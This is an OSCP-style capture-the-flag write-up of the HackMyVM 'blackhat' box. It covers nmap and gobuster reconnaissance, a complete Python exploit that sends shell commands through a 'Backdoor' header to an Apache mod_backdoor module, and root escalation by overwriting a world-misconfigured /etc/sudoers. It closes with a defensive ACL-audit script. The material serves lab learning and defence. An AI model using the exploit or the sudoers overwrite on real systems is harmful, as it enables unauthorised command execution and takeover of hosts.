OSCP Lab
Lab introduction
blackhat | easy | Information gathering, Apache_HTTP_Server_Module_Backdoor exploitation
Information gathering
Host discovery
nmap -sn 192.168.1.0/24
Port scanning
└─# nmap -sV -A -p- -T4 192.168.1.44
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-21 02:16 EST
Nmap scan report for 192.168.1.44
Host is up (0.00076s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Hacked By HackMyVM
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:75:FC:80 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.1.44
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds
Directory scanning
The directory scan only turned up phpinfo.php.
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.44 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.44
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.44/.php (Status: 403) [Size: 277]
http://192.168.1.44/.html (Status: 403) [Size: 277]
http://192.168.1.44/index.html (Status: 200) [Size: 1437]
http://192.168.1.44/.php (Status: 403) [Size: 277]
http://192.168.1.44/.html (Status: 403) [Size: 277]
http://192.168.1.44/phpinfo.php (Status: 200) [Size: 69322]
http://192.168.1.44/server-status (Status: 403) [Size: 277]
http://192.168.1.44/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403) [Size: 277]
Progress: 5095332 / 5095336 (100.00%)
===============================================================
Finished
===============================================================
Combining the hint on the homepage ("check backdoor") with the phpinfo output, we find that the server has the mod_backdoor module loaded.
Gaining access
https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor/blob/master/exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys


def exploit(host, port, command):
    # The backdoored module reads the command to run from the "Backdoor" request header
    headers = {
        "Backdoor": command
    }
    url = "http://%s:%d/" % (host, port)
    response = requests.get(url, headers=headers)
    content = response.text
    print(content)


def main():
    if len(sys.argv) != 3:
        print("Usage : ")
        print("\tpython %s [HOST] [PORT]" % (sys.argv[0]))
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    # Interactive loop: each line typed is sent as one command; "exit" quits
    while True:
        command = input("$ ")
        if command == "exit":
            break
        exploit(host, port, command)


if __name__ == "__main__":
    main()
Run the exploit to obtain access.
Privilege escalation
Here we find that su to the darkdante account works without a password.
Use the following command to list the directories and files we have write access to; it shows that the sudoers file is writable.
find / -writable 2>/dev/null | grep -v -E "proc|dev"
darkdante@blackhat:~$ getfacl /etc/sudoers
getfacl: Removing leading '/' from absolute path names
# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---
Since it is writable, we add the following entry directly, then run /bin/bash with sudo to escalate to root.
echo "darkdante ALL=(ALL:ALL) /bin/bash" > /etc/sudoers
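As an added defensive check (not part of the original writeup or of the box), a small Python script that parses getfacl output and flags any ACL entry other than the file owner that has effective write access, which is exactly the sudoers misconfiguration found above. The sample input is the getfacl output shown above; `audit_path` assumes the `getfacl` binary from the acl package is installed on the host being checked.

```python
import re
import subprocess

# Constructed sample: the getfacl output for /etc/sudoers quoted in this writeup.
SAMPLE_GETFACL = """\
# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---
"""
# Access ACL entries only; "default:" entries on directories are ignored.
ACL_LINE = re.compile(r"^(user|group|mask|other):([^:]*):([rwx-]{3})$")

def parse_getfacl(text):
    """Return (tag, qualifier, perms) tuples for each ACL entry in getfacl output."""
    entries = []
    for line in text.splitlines():
        m = ACL_LINE.match(line.strip())  # "# file/owner/group" comments are skipped
        if m:
            entries.append(m.groups())
    return entries

def apply_mask(perms, mask):
    """Named users, named groups and the owning group are limited by the mask entry."""
    if mask is None:
        return perms
    return "".join(p if p != "-" and m != "-" else "-" for p, m in zip(perms, mask))

def find_unexpected_writers(text):
    """List every ACL entry except the file owner that grants effective write access."""
    entries = parse_getfacl(text)
    mask = next((perms for tag, _, perms in entries if tag == "mask"), None)
    findings = []
    for tag, qualifier, perms in entries:
        if tag == "mask" or (tag == "user" and qualifier == ""):
            continue  # the mask itself and the owner entry are not findings
        effective = perms if tag == "other" else apply_mask(perms, mask)
        if "w" in effective:
            findings.append((tag, qualifier, effective))
    return findings

def audit_path(path):
    """Run getfacl on a real file (needs the acl package installed) and report writers."""
    proc = subprocess.run(["getfacl", "-p", path], capture_output=True, text=True, check=True)
    return find_unexpected_writers(proc.stdout)
```

On the sample above, `find_unexpected_writers` returns `[("user", "darkdante", "rw-")]`; a clean sudoers (owner rw or r only, no named-user entries) returns an empty list, so the function is suitable for a periodic audit of /etc/sudoers and /etc/sudoers.d.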
End
Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】blackhat